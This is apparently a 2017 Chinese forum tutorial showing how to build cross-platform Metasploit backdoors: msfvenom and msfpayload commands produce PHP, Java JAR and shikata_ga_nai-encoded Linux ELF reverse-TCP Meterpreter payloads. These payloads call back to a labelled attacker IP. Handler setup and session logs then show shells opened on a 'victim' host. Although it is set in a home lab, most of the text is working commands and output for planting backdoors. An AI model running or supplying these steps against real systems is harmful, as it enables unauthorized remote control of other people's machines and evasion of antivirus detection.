本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑
标题:Metasploit后门渗透Linux系统以及跨平台后门生成
作者:小爱_Joker
难度:两级
阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。
攻击者IP:192.168.0.5
受害者IP:192.168.0.3
1:PHP后门生成
[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.5 -f raw >/root/桌面/test.php

QQ截图20170308141854.png (388.35 KB, 下载次数: 83)
2017-3-9 17:47 上传
首先先来讲解一下LHOST= 什么意思 LHOST 是本机IP地址 也就是在内网中的 不知道的可以ifconfig 查看一下 由于我虚拟机是直接复制的物理机网络所以直接使用eth0

QQ截图20170308141440.png (415.41 KB, 下载次数: 124)
2017-3-9 17:47 上传
PHP后门生成如下图

QQ截图20170308141705.png (439.06 KB, 下载次数: 94)
2017-3-9 17:47 上传
$ip = '192.168.0.5'; $port = 4444 192.168.0.5是我在内网中的IP 上面已经说过了 这个4444 就是我监听的端口 上面我没有配置监听端口 Msf默认监听端口为:4444
配置Metasploit
[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler //使用模块
msf exploit(handler) > set lhost IP //设置kali的ip 不知道的可以ifconfig 查看一下
msf exploit(handler) > set payload php/meterpreter/reverse_tcp //设置我们测试的载荷
msf exploit(handler) > run //监听Msf后门这方面 都是用的msf的handler模块 通常都是以上配置方法
配置完成后run //监听一下 如下图

QQ截图20170308172732.png (492.23 KB, 下载次数: 85)
2017-3-9 17:48 上传
由于我搭建好php运行环境了 我们运行一下
[AppleScript] 纯文本查看 复制代码service apache2 start //开启apache2服务打开 http://192.168.0.5/test.php msf成功连接
这里我吧生成的php后门放到了kali下的/var/www/html目录
QQ截图20170308172919.png (884.29 KB, 下载次数: 108)
2017-3-9 17:48 上传
测试成功后 我们exit 退出 继续测试连接windows

QQ截图20170308173303.png (911.25 KB, 下载次数: 115)
2017-3-9 17:50 上传
成功连接
shell 如下图

QQ截图20170308173330.png (505.29 KB, 下载次数: 96)
2017-3-9 17:49 上传
2:java后门
[AppleScript] 纯文本查看 复制代码msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.5 -o /root/桌面/test.jar

QQ截图20170309175635.png (130.75 KB, 下载次数: 91)
2017-3-9 17:56 上传
接着我们转到msf
吧生成后的后门移到windows上打开一下 我们可以看到我们的msf成功上线

QQ截图20170309175926.png (448.01 KB, 下载次数: 110)
2017-3-9 18:00 上传
[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.5
lhost => 192.168.0.5
msf exploit(handler) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(handler) > run
Started reverse TCP handler on 192.168.0.5:4444 Starting the payload handler... Sending stage (49645 bytes) to 192.168.0.3[/size][/font][font=仿宋,仿宋_GB2312][size=3] Meterpreter session 1 opened (192.168.0.5:4444 -> 192.168.0.3:10753) at 2017-03-09 17:59:14 +0800
meterpreter >
shell

QQ截图20170309180038.png (259.06 KB, 下载次数: 99)
2017-3-9 18:00 上传
linux系统测试如下
exit 退出
run 监听
[AppleScript] 纯文本查看 复制代码root@xaiSec:~/桌面# java -jar test.jar

QQ截图20170309180258.png (365.36 KB, 下载次数: 114)
2017-3-9 18:03 上传
3:Linux后门
Ps:这里我拿kali1.0测试 2016的不知道咋回事有linux模块生成的时候有点错误
攻击者IP:192.168.0.9

QQ截图20170309193322.png (61.33 KB, 下载次数: 111)
2017-3-9 19:36 上传
实战如下[AppleScript] 纯文本查看 复制代码root@xaiSec:~# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai >> /root/Desktop/test

QQ截图20170309194338.png (56.49 KB, 下载次数: 104)
2017-3-9 19:43 上传
配置Metasploit 如下
[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.0.9
lhost => 192.168.0.9
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > run
Started reverse handler on 192.168.0.9:4444 Starting the payload handler...
QQ截图20170309194446.png (85.39 KB, 下载次数: 114)
2017-3-9 19:45 上传
直接./test 运行的话 它会提示没有运行权限
接着我们来赋予它执行权限
[AppleScript] 纯文本查看 复制代码root@xaiSec:~# cd /root/Desktop
root@xaiSec:~/Desktop# ls
test
root@xaiSec:~/Desktop# ./test
bash: ./test: 权限不够
root@xaiSec:~/Desktop# chmod +x ./test
root@xaiSec:~/Desktop# ./test
赋予执行权限运行后 我们的msf成功上线
如下图

QQ截图20170309194833.png (131.51 KB, 下载次数: 115)
2017-3-9 19:49 上传
shell 如下图

QQ图片20170309195008.png (97.65 KB, 下载次数: 108)
2017-3-9 19:50 上传
运行下linux命令试一下
成功 如下图

QQ截图20170309195110.png (100.32 KB, 下载次数: 100)
2017-3-9 19:51 上传
本次文章到这里了 写了一天 不是特别麻烦 因为2016的kali我没有更新源等一系列问题 所以更新源之类的耽误了点时间. 接着linux后门的时候 2016有点小错误 下的1.0kali 虚拟机安装 实战的 所以耽误了点时间
另外:结束语:勿忘初心 方得始终.